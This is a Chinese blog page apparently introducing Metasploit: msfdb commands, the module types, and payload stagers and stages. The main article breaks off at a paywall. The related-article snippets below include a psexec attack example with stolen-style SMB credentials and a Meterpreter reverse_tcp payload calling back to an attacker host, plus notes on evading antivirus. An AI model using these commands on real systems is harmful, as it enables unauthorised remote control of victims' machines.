MSF——基本使用和Exploit模块(一)

最新推荐文章于 2024-05-08 17:20:32 发布
最新推荐文章于 2024-05-08 17:20:32 发布
阅读量3.1k 收藏 22
点赞数 1
文章标签: 数据库 操作系统 shell
原文链接:http://www.cnblogs.com/dogecheng/p/11450423.html
版权

MSF系列:

MSF——基本使用和Exploit模块(一)

MSF——Payload模块(二)

MSF——Meterpreter(三)

MSF——信息收集(四)

MSF——Metasploit Framework

目前最流行、最强大、最具扩展性的渗透测试平台软件

2003年由HD More发布第一版,2007年用ruby语言重写,MSF默认集成在Kali Linux之中

Kali左侧有MSF的快捷方式,可以直接点击使用,也可以在终端输入msfconsole启动MSF

msfdb

用来管理MSF的数据库的命令

msfdb init     # start and initialize the database
msfdb reinit   # delete and reinitialize the database
msfdb delete   # delete database and stop using it
msfdb start    # start the database
msfdb stop     # stop the database
msfdb status   # check service status
msfdb run      # start the database and run msfconsole

MSF架构——技术功能模块

MSF默认存放模块的目录如下

/usr/share/metasploit-framework/modules/

MSF有6个模块,分别对上面目录下的6个子文件夹:

auxiliary

负责执行信息收集、扫描、嗅探、指纹识别、口令猜测和Dos攻击等功能的辅助模块

exploits

利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击方法(主动、被动) 

payloads

成功exploit之后,真正在目标系统执行的代码或指令。分为3种类型的payload,分别是single、stages和stagers。shellcode是特殊的payload,用于拿shell。

  • single:all-in-one。完整的payload,这些payload都是一体化的,不需要依赖外部的库和包。
  • stagers:目标计算机内存有限时,先传输一个较小的payload用于建立连接
  • stages:利用stagers建立的连接下载后续payload 

encoders

对payload进行加密,躲避AntiVirus检查的模块

nops

提高payload稳定性及维持大小。在渗透攻击构造恶意数据缓冲区时,常常要在真正要执行的Shellcode之前添加一段空指令区, 这样当触发渗透攻击后跳转

最低0.47元/天 解锁文章
dishan4749253
关注
  • 1
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MSF辅助模块Auxiliary,Exploit应用,CVE-2015-1635漏洞攻防实战
04-04
MSF辅助模块Auxiliary,Exploit应用,CVE-2015-1635漏洞攻防实战
比较RationalUnifiedProcess(RUP)和MicrosoftSolutionsFramework(MSF)
03-03
火龙果软件工程技术中心 本文内容包括:RUP和MSF的定义第一印象:从MSF到RUP的高层的映射过程设想映射其他元素原则结束语致谢:注释参考文献:现在对本文进行讨论!参考资料本文来自于RationalEdge:...
【内网渗透】MSFexploit和pyload的基础使用
qq_37870222的博客
04-24 1507
【内网渗透】MSFexploit和pyload的基础使用1、连接MSFroot@kali:~# msfconsole2、显示所有攻击模块msf > show exploits |more3、寻找攻击模块msf > search ms08_0674、使用攻击模块msf > use /exploits/windows/tftp/tftpd32_long_filename5、显示pa...
metasploit update exploit-db
weixin_30840573的博客
02-03 165
echo "Updating The Exploit-DB" cd /usr/share/exploitdb/ wget http://www.exploit-db.com/archive.tar.bz2 tar -xvjf /usr/share/exploitdb/archive.tar.bz2 rm /usr/share/exploitdb/archive.tar.bz2 echo ...
渗透测试-MSF工具使用简介及命令使用漏洞利用过程
XLbb的博客
05-08 2041
1.MSF工具使用简介及命令使用(kali系统) 1.1什么是MSF: Metasploit就是一个漏洞框架,是一个免费、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数2000多个已知软件漏洞的专业级漏洞攻击工具。 步骤一:在kali系统中运行msf软件 :msfconsole; 如:测试编号为cve-2019-0708 的漏洞(windows7漏洞); 根据漏洞编号,用search查找相应的漏洞攻击工具。
MSF使用详解
m0_52051132的博客
10-19 7927
一、 Meterpreter是什么Meterpreter是Metasploit框架中的一个利器,作为漏洞溢出后的攻击载荷使用,攻击载荷在触发漏洞后会返回一个由我们控制的通道,可用于远程执行命令!Metasploit提供了各个主流平台的Meterpreter版本,包括Windows、Linux,同时支持x86、x64平台,另外,Meterpreter还提供了基于PHP和Java语言的实现。Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。
【常用工具】MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)
热门推荐
Fighting_hawk的博客
03-27 2万+
1. 了解MSF框架的使用方法。 2. 了解永恒之蓝漏洞。
Metasploit 使用
weixin_45626840的博客
02-19 719
Metasploit使用基础
[ MSF ] Meterpreter扩展模块命令详解.docx
02-11
Meterpreter 不仅仅是一个简单的 shell,它是一个完整的后渗透环境,支持多种扩展模块和功能。它能够创建持久化的连接,即使在目标系统重启后也能保持控制。此外,Meterpreter 还允许测试者在不同的会话之间切换,...
msf5 自动攻击模块 db_autopwn
07-10
`db_autopwn`是Metasploit Framework(msf5)中的一个核心功能模块,它允许渗透测试者进行自动化漏洞利用,大大提高了效率。这个模块在安全审计和渗透测试过程中扮演着重要角色,因为它能够快速扫描并尝试攻击目标...
74-74.渗透测试-MSF核心模块.mp4
最新发布
05-10
74-74.渗透测试-MSF核心模块.mp4
M个案研究——微软如何使用MSF做软件开发学习教案.pptx
12-27
本案研究为开发团队提供了一份详细的MSF使用指南,帮助开发团队更好地规划、设计、开发和测试软件产品。 知识点: 1. 微软的MSF框架 2. SharePoint Team Services产品的开发过程 3. 团队结构和汇报结构 4. MSF在...
msf-with-rubymine:如何使用Ruby开发metasploit模块
04-10
msf-with-rubymine 如何在RubyMine中使用metasploit1.设置您的开发环境在第一步中安装软件包: : 2.在〜/ .msf4中添加一个Gemfile: # ~/.msf4/Gemfilesource 'https://rubygems.org'gem 'metasploit-framework', ...
MSF-基本原则及团队模型
12-01
微软解决方案框架(MSF)是一种综合性的方法论,旨在帮助组织高效地管理和实施软件开发项目。MSF结合了项目管理的实践、团队建设的原则以及风险管理的策略,旨在提高项目的成功率和质量。 MSF基本原理包括推动...
msf使用方法
06-29
描述:本篇详细介绍了Metasploit Framework(简称MSF)的使用方法,MSF是一款强大的渗透测试工具,被广泛应用于安全评估、漏洞利用以及恶意软件研究等领域。以下将深入解析MSF的核心功能及操作流程。 ### MSF基本...
MSFconsole(msf渗透神器)windows平台可以 使用,亲测可用
11-27
"MSFconsole(msf渗透神器)windows平台可以使用,亲测可用" 指出该资源是Metasploit Framework(简称MSF)的一个版本,特别适用于Windows操作系统,并且已经被验证为可正常运行。MSFconsole是Metasploit Framework的...
msf基础使用
longwanlian的博客
12-12 434
终端输入msfconsole。
MSF使用小技巧
永远是少年
06-08 4218
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF使用小技巧。 一、MSF命令行开启 二、MSF退出 三、MSF 数据库导入和导出 四、MSF会话设置
Exploit利器——Pwntools
loka的专栏
08-24 1513
  pwntools是由Gallopsled开发的一款专用于CTF Exploit的Python库,包含了本地执行、远程连接读写、shellcode生成、ROP链的构建、ELF解析、符号泄漏等众多强大功能,可以说把exploit繁琐的过程变得简单起来。这里简单介绍一下它的使用。 安装 Pwntools的主页在pwntools.com,Github项目地址为pwntools,可以下载到最新...
msfexploit/windows/smb/psexec模块使用
05-23
msfexploit/windows/smb/psexec模块是一种基于SMB协议的远程执行漏洞利用模块,可以用于尝试利用目标机器上的Windows系统漏洞,并在远程执行的过程中获得对目标机器的控制权限。使用模块需要先设置相关参数,包括目标机器的IP地址、用户名、密码、要执行的命令等等,然后使用run命令启动攻击。 下面是一个使用msfexploit/windows/smb/psexec模块的示例: 1. 设置目标机器IP地址、用户名、密码等参数: ``` set RHOST 192.168.1.100 set SMBUser Administrator set SMBPass Password123 ``` 2. 设置要执行的命令: ``` set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.101 set ExitOnSession false ``` 3. 启动攻击: ``` run ``` 这样就会尝试利用目标机器上的Windows系统漏洞,并在远程执行的过程中获得对目标机器的控制权限。在成功执行攻击之后,可以使用Meterpreter控制台进行后续操作,比如查看目标机器的文件、进程等信息,或者执行其他的攻击操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值